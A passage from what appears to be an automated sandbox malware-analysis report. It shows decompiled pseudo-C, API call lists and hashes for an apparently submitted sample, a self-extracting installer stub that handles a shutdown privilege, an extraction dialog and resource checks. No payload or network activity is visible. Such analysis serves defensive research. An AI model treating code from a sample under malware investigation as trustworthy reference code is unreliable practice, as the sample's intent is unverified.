                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00BC61F8
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                        • String ID: "$"$:$RegServer
                                                                                                                                                                                                        • API String ID: 1203814774-25366791
                                                                                                                                                                                                        • Opcode ID: 1daf4c0e7212e6dd285d5a6c32ce93390c9fe848ace84f334960e48f7e7b1f20
                                                                                                                                                                                                        • Instruction ID: 033a691e9771239a5590d2efc0da4d81114e644608bfe698e96b3483d9e719e3
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1daf4c0e7212e6dd285d5a6c32ce93390c9fe848ace84f334960e48f7e7b1f20
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F2D10671A04A555EDB358B3C8C88FFA7BE1EB1A305F1841EED4C6D7191DA70AEC28B11
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 60%
                                                                                                                                                                                                        			E00BC1F90(signed int __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				int _v12;
                                                                                                                                                                                                        				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                                                                                                        				void* _v28;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				signed int _t13;
                                                                                                                                                                                                        				int _t21;
                                                                                                                                                                                                        				void* _t25;
                                                                                                                                                                                                        				int _t28;
                                                                                                                                                                                                        				signed char _t30;
                                                                                                                                                                                                        				void* _t38;
                                                                                                                                                                                                        				void* _t40;
                                                                                                                                                                                                        				void* _t41;
                                                                                                                                                                                                        				signed int _t46;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t41 = __esi;
                                                                                                                                                                                                        				_t38 = __edi;
                                                                                                                                                                                                        				_t30 = __ecx;
                                                                                                                                                                                                        				if((__ecx & 0x00000002) != 0) {
                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                        					if((_t30 & 0x00000004) != 0) {
                                                                                                                                                                                                        						L14:
                                                                                                                                                                                                        						if( *0xbc9a40 != 0) {
                                                                                                                                                                                                        							_pop(_t30);
                                                                                                                                                                                                        							_t44 = _t46;
                                                                                                                                                                                                        							_t13 =  *0xbc8004; // 0x9f7d84ca
                                                                                                                                                                                                        							_v8 = _t13 ^ _t46;
                                                                                                                                                                                                        							_push(_t38);
                                                                                                                                                                                                        							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                                                                                                                                                        								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                                                                                                                                                        								_v24.PrivilegeCount = 1;
                                                                                                                                                                                                        								_v12 = 2;
                                                                                                                                                                                                        								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                                                                                                                                                        								CloseHandle(_v28);
                                                                                                                                                                                                        								_t41 = _t41;
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								if(_t21 != 0) {
                                                                                                                                                                                                        									if(ExitWindowsEx(2, ??) != 0) {
                                                                                                                                                                                                        										_t25 = 1;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t37 = 0x4f7;
                                                                                                                                                                                                        										goto L3;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t37 = 0x4f6;
                                                                                                                                                                                                        									goto L4;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t37 = 0x4f5;
                                                                                                                                                                                                        								L3:
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								L4:
                                                                                                                                                                                                        								_push(0x10);
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								E00BC44B9(0, _t37);
                                                                                                                                                                                                        								_t25 = 0;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_pop(_t40);
                                                                                                                                                                                                        							return E00BC6CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t28 = ExitWindowsEx(2, 0);
                                                                                                                                                                                                        							goto L16;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t37 = 0x522;
                                                                                                                                                                                                        						_t28 = E00BC44B9(0, 0x522, 0xbc1140, 0, 0x40, 4);
                                                                                                                                                                                                        						if(_t28 != 6) {
                                                                                                                                                                                                        							goto L16;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					__eax = E00BC1EA7(__ecx);
                                                                                                                                                                                                        					if(__eax != 2) {
                                                                                                                                                                                                        						L16:
                                                                                                                                                                                                        						return _t28;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						goto L12;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}


















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00BC1EFB
                                                                                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00BC1F02
                                                                                                                                                                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 00BC1FD3
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                        • String ID: SeShutdownPrivilege
                                                                                                                                                                                                        • API String ID: 2795981589-3733053543
                                                                                                                                                                                                        • Opcode ID: 8713a1302874481f83ba3036ffb6906273bfa3c28ef8c9a6ea531d00fce76717
                                                                                                                                                                                                        • Instruction ID: 849190378b6600a70fe522e04a2434f124553de0f9ffbd4296c32130e6052494
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8713a1302874481f83ba3036ffb6906273bfa3c28ef8c9a6ea531d00fce76717
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0C21FC71B402056BDB209BA99C4EF7F7BF8EB8B754F20085CFA02F7182DB7488019261
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00BC6CF0(struct _EXCEPTION_POINTERS* _a4) {
                                                                                                                                                                                                        
                                                                                                                                                                                                        				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                        				UnhandledExceptionFilter(_a4);
                                                                                                                                                                                                        				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                        			}



                                                                                                                                                                                                        0x00bc6cf7
                                                                                                                                                                                                        0x00bc6d00
                                                                                                                                                                                                        0x00bc6d19

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00BC6E26,00BC1000), ref: 00BC6CF7
                                                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(00BC6E26,?,00BC6E26,00BC1000), ref: 00BC6D00
                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(C0000409,?,00BC6E26,00BC1000), ref: 00BC6D0B
                                                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,?,00BC6E26,00BC1000), ref: 00BC6D12
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3231755760-0
                                                                                                                                                                                                        • Opcode ID: 7497387ef2177ee944a398af7904c923116632ccc3d80daac542c0ec0feb022b
                                                                                                                                                                                                        • Instruction ID: 909a6925e485233c2fd4fdf55423c5caa013a0abd82984c8cd940c6be8ae6003
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7497387ef2177ee944a398af7904c923116632ccc3d80daac542c0ec0feb022b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6DD0C93200010CBFDB002BF1EC0CE593F28EB4E21AF4D4000F319E3020CE3254518B62
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 76%
                                                                                                                                                                                                        			E00BC3210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* _t6;
                                                                                                                                                                                                        				void* _t10;
                                                                                                                                                                                                        				int _t20;
                                                                                                                                                                                                        				int _t21;
                                                                                                                                                                                                        				int _t23;
                                                                                                                                                                                                        				char _t24;
                                                                                                                                                                                                        				long _t25;
                                                                                                                                                                                                        				int _t27;
                                                                                                                                                                                                        				int _t30;
                                                                                                                                                                                                        				void* _t32;
                                                                                                                                                                                                        				int _t33;
                                                                                                                                                                                                        				int _t34;
                                                                                                                                                                                                        				int _t37;
                                                                                                                                                                                                        				int _t38;
                                                                                                                                                                                                        				int _t39;
                                                                                                                                                                                                        				void* _t42;
                                                                                                                                                                                                        				void* _t46;
                                                                                                                                                                                                        				CHAR* _t49;
                                                                                                                                                                                                        				void* _t58;
                                                                                                                                                                                                        				void* _t63;
                                                                                                                                                                                                        				struct HWND__* _t64;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t64 = _a4;
                                                                                                                                                                                                        				_t6 = _a8 - 0x10;
                                                                                                                                                                                                        				if(_t6 == 0) {
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					L38:
                                                                                                                                                                                                        					EndDialog(_t64, ??);
                                                                                                                                                                                                        					L39:
                                                                                                                                                                                                        					__eflags = 1;
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t42 = 1;
                                                                                                                                                                                                        				_t10 = _t6 - 0x100;
                                                                                                                                                                                                        				if(_t10 == 0) {
                                                                                                                                                                                                        					E00BC43D0(_t64, GetDesktopWindow());
                                                                                                                                                                                                        					SetWindowTextA(_t64, "photo660");
                                                                                                                                                                                                        					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                                                                                                                                                                        					__eflags =  *0xbc9a40 - _t42; // 0x3
                                                                                                                                                                                                        					if(__eflags == 0) {
                                                                                                                                                                                                        						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L36:
                                                                                                                                                                                                        					return _t42;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t10 == _t42) {
                                                                                                                                                                                                        					_t20 = _a12 - 1;
                                                                                                                                                                                                        					__eflags = _t20;
                                                                                                                                                                                                        					if(_t20 == 0) {
                                                                                                                                                                                                        						_t21 = GetDlgItemTextA(_t64, 0x835, 0xbc91e4, 0x104);
                                                                                                                                                                                                        						__eflags = _t21;
                                                                                                                                                                                                        						if(_t21 == 0) {
                                                                                                                                                                                                        							L32:
                                                                                                                                                                                                        							_t58 = 0x4bf;
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        							_push(0x10);
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        							L25:
                                                                                                                                                                                                        							E00BC44B9(_t64, _t58);
                                                                                                                                                                                                        							goto L39;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t49 = 0xbc91e4;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t23 =  *_t49;
                                                                                                                                                                                                        							_t49 =  &(_t49[1]);
                                                                                                                                                                                                        							__eflags = _t23;
                                                                                                                                                                                                        						} while (_t23 != 0);
                                                                                                                                                                                                        						__eflags = _t49 - 0xbc91e5 - 3;
                                                                                                                                                                                                        						if(_t49 - 0xbc91e5 < 3) {
                                                                                                                                                                                                        							goto L32;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t24 =  *0xbc91e5; // 0x3a
                                                                                                                                                                                                        						__eflags = _t24 - 0x3a;
                                                                                                                                                                                                        						if(_t24 == 0x3a) {
                                                                                                                                                                                                        							L21:
                                                                                                                                                                                                        							_t25 = GetFileAttributesA(0xbc91e4);
                                                                                                                                                                                                        							__eflags = _t25 - 0xffffffff;
                                                                                                                                                                                                        							if(_t25 != 0xffffffff) {
                                                                                                                                                                                                        								L26:
                                                                                                                                                                                                        								E00BC658A(0xbc91e4, 0x104, 0xbc1140);
                                                                                                                                                                                                        								_t27 = E00BC58C8(0xbc91e4);
                                                                                                                                                                                                        								__eflags = _t27;
                                                                                                                                                                                                        								if(_t27 != 0) {
                                                                                                                                                                                                        									__eflags =  *0xbc91e4 - 0x5c;
                                                                                                                                                                                                        									if( *0xbc91e4 != 0x5c) {
                                                                                                                                                                                                        										L30:
                                                                                                                                                                                                        										_t30 = E00BC597D(0xbc91e4, 1, _t64, 1);
                                                                                                                                                                                                        										__eflags = _t30;
                                                                                                                                                                                                        										if(_t30 == 0) {
                                                                                                                                                                                                        											L35:
                                                                                                                                                                                                        											_t42 = 1;
                                                                                                                                                                                                        											__eflags = 1;
                                                                                                                                                                                                        											goto L36;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										L31:
                                                                                                                                                                                                        										_t42 = 1;
                                                                                                                                                                                                        										EndDialog(_t64, 1);
                                                                                                                                                                                                        										goto L36;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									__eflags =  *0xbc91e5 - 0x5c;
                                                                                                                                                                                                        									if( *0xbc91e5 == 0x5c) {
                                                                                                                                                                                                        										goto L31;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									goto L30;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								_push(0x10);
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								_t58 = 0x4be;
                                                                                                                                                                                                        								goto L25;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t32 = E00BC44B9(_t64, 0x54a, 0xbc91e4, 0, 0x20, 4);
                                                                                                                                                                                                        							__eflags = _t32 - 6;
                                                                                                                                                                                                        							if(_t32 != 6) {
                                                                                                                                                                                                        								goto L35;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t33 = CreateDirectoryA(0xbc91e4, 0);
                                                                                                                                                                                                        							__eflags = _t33;
                                                                                                                                                                                                        							if(_t33 != 0) {
                                                                                                                                                                                                        								goto L26;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        							_push(0x10);
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        							_push(0xbc91e4);
                                                                                                                                                                                                        							_t58 = 0x4cb;
                                                                                                                                                                                                        							goto L25;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags =  *0xbc91e4 - 0x5c;
                                                                                                                                                                                                        						if( *0xbc91e4 != 0x5c) {
                                                                                                                                                                                                        							goto L32;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags = _t24 - 0x5c;
                                                                                                                                                                                                        						if(_t24 != 0x5c) {
                                                                                                                                                                                                        							goto L32;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						goto L21;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t34 = _t20 - 1;
                                                                                                                                                                                                        					__eflags = _t34;
                                                                                                                                                                                                        					if(_t34 == 0) {
                                                                                                                                                                                                        						EndDialog(_t64, 0);
                                                                                                                                                                                                        						 *0xbc9124 = 0x800704c7;
                                                                                                                                                                                                        						goto L39;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__eflags = _t34 != 0x834;
                                                                                                                                                                                                        					if(_t34 != 0x834) {
                                                                                                                                                                                                        						goto L36;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t37 = LoadStringA( *0xbc9a3c, 0x3e8, 0xbc8598, 0x200);
                                                                                                                                                                                                        					__eflags = _t37;
                                                                                                                                                                                                        					if(_t37 != 0) {
                                                                                                                                                                                                        						_t38 = E00BC4224(_t64, _t46, _t46);
                                                                                                                                                                                                        						__eflags = _t38;
                                                                                                                                                                                                        						if(_t38 == 0) {
                                                                                                                                                                                                        							goto L36;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t39 = SetDlgItemTextA(_t64, 0x835, 0xbc87a0);
                                                                                                                                                                                                        						__eflags = _t39;
                                                                                                                                                                                                        						if(_t39 != 0) {
                                                                                                                                                                                                        							goto L36;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t63 = 0x4c0;
                                                                                                                                                                                                        						L9:
                                                                                                                                                                                                        						E00BC44B9(_t64, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						_push(0);
                                                                                                                                                                                                        						goto L38;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t63 = 0x4b1;
                                                                                                                                                                                                        					goto L9;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}

























                                                                                                                                                                                                        0x00bc3367
                                                                                                                                                                                                        0x00bc3369
                                                                                                                                                                                                        0x00bc336a
                                                                                                                                                                                                        0x00bc336b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc336b
                                                                                                                                                                                                        0x00bc331c
                                                                                                                                                                                                        0x00bc3323
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3329
                                                                                                                                                                                                        0x00bc332b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc332b
                                                                                                                                                                                                        0x00bc324c
                                                                                                                                                                                                        0x00bc324c
                                                                                                                                                                                                        0x00bc324f
                                                                                                                                                                                                        0x00bc32c8
                                                                                                                                                                                                        0x00bc32ce
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc32ce
                                                                                                                                                                                                        0x00bc3251
                                                                                                                                                                                                        0x00bc3256
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc3271
                                                                                                                                                                                                        0x00bc3277
                                                                                                                                                                                                        0x00bc3279
                                                                                                                                                                                                        0x00bc3298
                                                                                                                                                                                                        0x00bc329d
                                                                                                                                                                                                        0x00bc329f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc32b0
                                                                                                                                                                                                        0x00bc32b6
                                                                                                                                                                                                        0x00bc32b8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc32be
                                                                                                                                                                                                        0x00bc3280
                                                                                                                                                                                                        0x00bc3289
                                                                                                                                                                                                        0x00bc328e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc328e
                                                                                                                                                                                                        0x00bc327b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc327b
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LoadStringA.USER32(000003E8,00BC8598,00000200), ref: 00BC3271
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00BC33E2
                                                                                                                                                                                                        • SetWindowTextA.USER32(?,photo660), ref: 00BC33F7
                                                                                                                                                                                                        • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00BC3410
                                                                                                                                                                                                        • GetDlgItem.USER32(?,00000836), ref: 00BC3426
                                                                                                                                                                                                        • EnableWindow.USER32(00000000), ref: 00BC342D
                                                                                                                                                                                                        • EndDialog.USER32(?,00000000), ref: 00BC343F
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$photo660
                                                                                                                                                                                                        • API String ID: 2418873061-1456563789
                                                                                                                                                                                                        • Opcode ID: a7de3ae82d01980f23ef12aee4a61804a360db92977a1f349a92e6722f71dd0c
                                                                                                                                                                                                        • Instruction ID: 6451eb0e1e18f58b0c1ee1b933d981a8e51afd7e990056e976257da28bd366ac
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a7de3ae82d01980f23ef12aee4a61804a360db92977a1f349a92e6722f71dd0c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 145127303802847BFB655B355C8DF7B2AD9DB8AF58F94C0ACF245A72D1CEA4CE019265
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E00BC2CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t13;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                                        				struct HRSRC__* _t31;
                                                                                                                                                                                                        				intOrPtr _t33;
                                                                                                                                                                                                        				void* _t43;
                                                                                                                                                                                                        				void* _t48;
                                                                                                                                                                                                        				signed int _t65;
                                                                                                                                                                                                        				struct HINSTANCE__* _t66;
                                                                                                                                                                                                        				signed int _t67;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t13 =  *0xbc8004; // 0x9f7d84ca
                                                                                                                                                                                                        				_v8 = _t13 ^ _t67;
                                                                                                                                                                                                        				_t65 = 0;
                                                                                                                                                                                                        				_t66 = __ecx;
                                                                                                                                                                                                        				_t48 = __edx;
                                                                                                                                                                                                        				 *0xbc9a3c = __ecx;
                                                                                                                                                                                                        				memset(0xbc9140, 0, 0x8fc);
                                                                                                                                                                                                        				memset(0xbc8a20, 0, 0x32c);
                                                                                                                                                                                                        				memset(0xbc88c0, 0, 0x104);
                                                                                                                                                                                                        				 *0xbc93ec = 1;
                                                                                                                                                                                                        				_t20 = E00BC468F("TITLE", 0xbc9154, 0x7f);
                                                                                                                                                                                                        				if(_t20 == 0 || _t20 > 0x80) {
                                                                                                                                                                                                        					_t64 = 0x4b1;
                                                                                                                                                                                                        					goto L32;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t27 = CreateEventA(0, 1, 1, 0);
                                                                                                                                                                                                        					 *0xbc858c = _t27;
                                                                                                                                                                                                        					SetEvent(_t27);
                                                                                                                                                                                                        					_t64 = 0xbc9a34;
                                                                                                                                                                                                        					if(E00BC468F("EXTRACTOPT", 0xbc9a34, 4) != 0) {
                                                                                                                                                                                                        						if(( *0xbc9a34 & 0x000000c0) == 0) {
                                                                                                                                                                                                        							L12:
                                                                                                                                                                                                        							 *0xbc9120 =  *0xbc9120 & _t65;
                                                                                                                                                                                                        							if(E00BC5C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                                                                                                                                                        								if( *0xbc8a3a == 0) {
                                                                                                                                                                                                        									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                                                                                                                                                        									if(_t31 != 0) {
                                                                                                                                                                                                        										_t65 = LoadResource(_t66, _t31);
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									if( *0xbc8184 != 0) {
                                                                                                                                                                                                        										__imp__#17();
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									if( *0xbc8a24 == 0) {
                                                                                                                                                                                                        										_t57 = _t65;
                                                                                                                                                                                                        										if(E00BC36EE(_t65) == 0) {
                                                                                                                                                                                                        											goto L33;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											_t33 =  *0xbc9a40; // 0x3
                                                                                                                                                                                                        											_t48 = 1;
                                                                                                                                                                                                        											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                                                                                                                                                                        												if(( *0xbc9a34 & 0x00000100) == 0 || ( *0xbc8a38 & 0x00000001) != 0 || E00BC18A3(_t64, _t66) != 0) {
                                                                                                                                                                                                        													goto L30;
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													_t64 = 0x7d6;
                                                                                                                                                                                                        													if(E00BC6517(_t57, 0x7d6, _t34, E00BC19E0, 0x547, 0x83e) != 0x83d) {
                                                                                                                                                                                                        														goto L33;
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														goto L30;
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												L30:
                                                                                                                                                                                                        												_t23 = _t48;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t23 = 1;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									E00BC2390(0xbc8a3a);
                                                                                                                                                                                                        									goto L33;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t64 = 0x520;
                                                                                                                                                                                                        								L32:
                                                                                                                                                                                                        								E00BC44B9(0, _t64, 0, 0, 0x10, 0);
                                                                                                                                                                                                        								goto L33;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t64 =  &_v268;
                                                                                                                                                                                                        							if(E00BC468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                                                                                                                                                                        								goto L3;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t43 = CreateMutexA(0, 1,  &_v268);
                                                                                                                                                                                                        								 *0xbc8588 = _t43;
                                                                                                                                                                                                        								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                                                                                                                                                        									goto L12;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									if(( *0xbc9a34 & 0x00000080) == 0) {
                                                                                                                                                                                                        										_t64 = 0x524;
                                                                                                                                                                                                        										if(E00BC44B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                                                                                                                                                                        											goto L12;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											goto L11;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t64 = 0x54b;
